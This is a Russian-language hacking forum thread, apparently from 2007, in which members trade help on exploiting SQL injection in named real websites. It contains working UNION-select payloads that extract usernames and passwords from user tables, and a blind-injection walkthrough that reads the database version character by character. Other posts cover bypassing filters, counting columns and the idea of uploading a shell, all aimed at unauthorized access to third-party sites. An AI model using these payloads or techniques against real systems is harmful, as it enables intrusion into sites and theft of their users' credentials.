Ваши вопросы по уязвимостям.

Discussion in 'Уязвимости' started by darky, 4 Aug 2007.

Thread Status:
Not open for further replies.
  1. ElteRUS

    ElteRUS Elder - Старейшина

    Joined:
    11 Oct 2007
    Messages:
    367
    Likes Received:
    460
    Reputations:
    93
    Такая ситуация: есть таблица юзеров форума - abc_user. Таблица находится в базе - abc-forum. Когда я пишу скулю

    site.com/fname.php?id=-1+union+select+1,username,2+from+abc-forum.abc_user/*

    выводиться такая ошибка

    You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '-forum.abc_user/*'

    Проблема как я понимаю в тире в имени базы. Подскажите, что делать с этим тире?
     
  2. Red_Red1

    Red_Red1 Banned

    Joined:
    12 Jan 2007
    Messages:
    246
    Likes Received:
    258
    Reputations:
    83
    У меня как-то фильтровалось нижнее подчеркивание и точка. Вышел из положения урл кодированием... незнаю как это понимать но факт был. Кодировал название таблицы в урл коды и запрос работал без этого нет.
     
    1 person likes this.
  3. VentRu

    VentRu New Member

    Joined:
    27 Sep 2007
    Messages:
    11
    Likes Received:
    1
    Reputations:
    0
    Нашел инъекцию, не blind, только при следующем запросе http://www.motonews.ru/news.moto?id=-1+union+select+1,password,3,4,5+from+aprilia_aprilia.user/*&catid=52
    сообщение об ошибке пропадает и страница отображается без проблем. load_file вроде работает. Скорее всего, настроена фильтрация. Может попробовать шелл залить? Или пытаться обойти фильтр?
     
  4. Constantine

    Constantine Elder - Старейшина

    Joined:
    24 Nov 2006
    Messages:
    798
    Likes Received:
    710
    Reputations:
    301
    VentRu как там дела с magic quotes обстоят?
     
  5. VentRu

    VentRu New Member

    Joined:
    27 Sep 2007
    Messages:
    11
    Likes Received:
    1
    Reputations:
    0
    да вроде в on.
     
  6. VentRu

    VentRu New Member

    Joined:
    27 Sep 2007
    Messages:
    11
    Likes Received:
    1
    Reputations:
    0
    :( Уже прикрыли. По крайней мере, ошибки синтаксиса уже нет.
     
  7. sasTO

    sasTO Banned

    Joined:
    2 Aug 2007
    Messages:
    205
    Likes Received:
    230
    Reputations:
    14
    Подскажите,как добиться вывода инфы, нашел скулю юнион работает,принтабельных полей 3(подобрал ордером),а выводить не выводит!

    Пример http://gbc.ge/index.php?kw=mcg&m=search&ncat=-23'+union+select+1,2,3/*&lang=rus
     
  8. Grey

    Grey Banned

    Joined:
    10 Jun 2006
    Messages:
    1,047
    Likes Received:
    1,315
    Reputations:
    1,159
    1) Если ты уверен что какие то поля выводятся, то скорее всего ты не правильно подобрал кол-во колонок (или не правильно составил подзапрос). Так что вначале перепроверь как ты все сделал.

    2) Версия мускула может быть 3 и тогда твой подзапрос будет бесполезен, с такой версией ты мало чего сделаешь.

    3) Иногда вывод может быть виден в исходниках страницы (я про html, а не php), т.е. для просмотра идешь в Вид-Исходный текст (это в опере) и там находишь колонки которые вывелись. Да кстати если тебе нужно будет закрыть какой нидь тег, то прям так и дописываешь, к примеру: concat('</title>',выводимая в теге колонка) - тогда тут вывод будет уже не в тайтале, а на самой странице.

    4) Если есть sql-инъекция то можешь попробывать посимвольный брут (+and+substring(version(),1,1)=5 и т.д.). Правда это займёт очень много времени.
     
    4 people like this.
  9. Scipio

    Scipio Well-Known Member

    Joined:
    2 Nov 2006
    Messages:
    733
    Likes Received:
    544
    Reputations:
    190
    неувидел там инъекции... с чего ты взял, что она есть?
     
  10. [53x]Shadow

    [53x]Shadow Leaders of Antichat

    Joined:
    25 Jan 2007
    Messages:
    284
    Likes Received:
    597
    Reputations:
    514
    Вообщем инъекция там есть, правда слепая =\
    Для того чтобы была не слепая надо зарегаться на сайте, а это только за $ - поэтому тут надо выбирать либо на халяву но ппц как долго, либо заплатить 1$ и в течении часа все слить =)

    Со слепой (если решишь все-таки продолжить) есть один нюанс - подзапросы с and не катят, поэтому надо через or - соответственно логика обратная, пример:
    Code:
    http://gbc.ge/index.php?kw=mcg&m=search&ncat=23'+or+(select+substring(version(),1,1)=5)/*&lang=rus
    такой запрос выведет норм страницу - значит первая цифра версии не 5!
    а вот такой запрос
    Code:
    http://gbc.ge/index.php?kw=mcg&m=search&ncat=23'+or+(select+substring(version(),1,1)=4)/*&lang=rus
    выведет пустую страницу - значит первая цифра версии 4!
    Вообщем я думаю логика понятна =)
    Версия там 4.x.x.(MySQL)
    дальше если есть желание перебором как написал Grey по именам таблиц, столбцов и т.д...
     
    7 people like this.
  11. Scipio

    Scipio Well-Known Member

    Joined:
    2 Nov 2006
    Messages:
    733
    Likes Received:
    544
    Reputations:
    190
    Хм, да есть... просто во-первых меня смутило отсутсвие and, а во-вторых я наверное че-то напутал, так как когда я пробовал после его запроса (после отсечения /*) поставить кавычку вылетала ошибка, вобщем глюканул или я или... скорее всего я
     
  12. cheb

    cheb Elder - Старейшина

    Joined:
    31 Jul 2006
    Messages:
    42
    Likes Received:
    12
    Reputations:
    0
    ребята, как раскрутить вот эту http://moto-life.com.ua/index/57' Sql иньекцию?
     
  13. Hood

    Hood New Member

    Joined:
    15 Mar 2007
    Messages:
    0
    Likes Received:
    0
    Reputations:
    0
    Помогите пожалуйста никак не могу подобрать количество полей.
    Пробовал и order by и group by и вручную дошел до 43 ничего не получается???
    HTML:
    http://www.radiocomponent.net/prices.php?companyPK=1+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42,43+from+companies+limit+0,1/*
     
    #233 Hood, 27 Oct 2007
    Last edited: 27 Oct 2007
  14. nikoTM

    nikoTM Elder - Старейшина

    Joined:
    25 Sep 2007
    Messages:
    41
    Likes Received:
    6
    Reputations:
    0

    помогите найти inj плз
     
  15. delay(0)

    delay(0) Member

    Joined:
    22 Nov 2006
    Messages:
    90
    Likes Received:
    41
    Reputations:
    6
    Возможно что-то вывести?
     
  16. Scipio

    Scipio Well-Known Member

    Joined:
    2 Nov 2006
    Messages:
    733
    Likes Received:
    544
    Reputations:
    190
    Хех, тут инъекция в select как я понял, это значит надо еще таблицу подбирать
    вот пример того как:
    Code:
    http://sirius.ldz.lv/sari/saraksts.asp?lngg=lv%20from%20table1--
    если подобрать это, то можно нарыть че нить например из системных таблиц sysibm можно узнать версию, пользователя и название базы, также после подбора можно будет узнать таблицы и колонки и соответственно вывести какуюто инфу из этого всего

    ЗЫ я в DB2 неочень, так что поправьте меня если я неправ

    ЗЗЫ Можно наверное и из других скриптов что то узнать, но меня самого именно этот вариант заинтересовал, т.к. инъекцию в Select я первый раз увидел
     
    #236 Scipio, 30 Oct 2007
    Last edited: 30 Oct 2007
    1 person likes this.
  17. 3DXJ@@/\/

    3DXJ@@/\/ New Member

    Joined:
    27 Oct 2007
    Messages:
    2
    Likes Received:
    0
    Reputations:
    0
    вот кажется нашёл sql инекцию http://epood.atf.ee/index.php?categoryID=402' пробовал подобрать поля,перебрал 50 полей , но ничего не получилось подскажите что не так сделал и есть ли там вообще инекция?
    п.с. подбирал:id=9999+union+select+null,null,null......../* и так далее
     
  18. freddi

    freddi Elder - Старейшина

    Joined:
    5 Jul 2006
    Messages:
    399
    Likes Received:
    243
    Reputations:
    145
    http://epood.atf.ee/index.php?categoryID=-402+order+by+1/*
    http://epood.atf.ee/index.php?categoryID=-402+union+select+1/*
    смотреть вывод в коде страницы.
     
    #238 freddi, 30 Oct 2007
    Last edited: 30 Oct 2007
    1 person likes this.
  19. sasTO

    sasTO Banned

    Joined:
    2 Aug 2007
    Messages:
    205
    Likes Received:
    230
    Reputations:
    14
    Подскажите что можно сделать с этой скулей
    код:

    http://forum.tomsk.ru/forum.php?a=9&g=34+order+by+9/*&t=713344

    при запросе юнион селект кидает на главную страницу
     
  20. Red_Red1

    Red_Red1 Banned

    Joined:
    12 Jan 2007
    Messages:
    246
    Likes Received:
    258
    Reputations:
    83
    2 fobofob
    На том же сайте вот тут http://forum.tomsk.ru/forum.php?a=24&user_id=-1357+union+select+111,222,3,4,555,666,7,8,9,10/*
    такой проблемы нету.
    Надеюсь помог :)
     
    1 person likes this.
Thread Status:
Not open for further replies.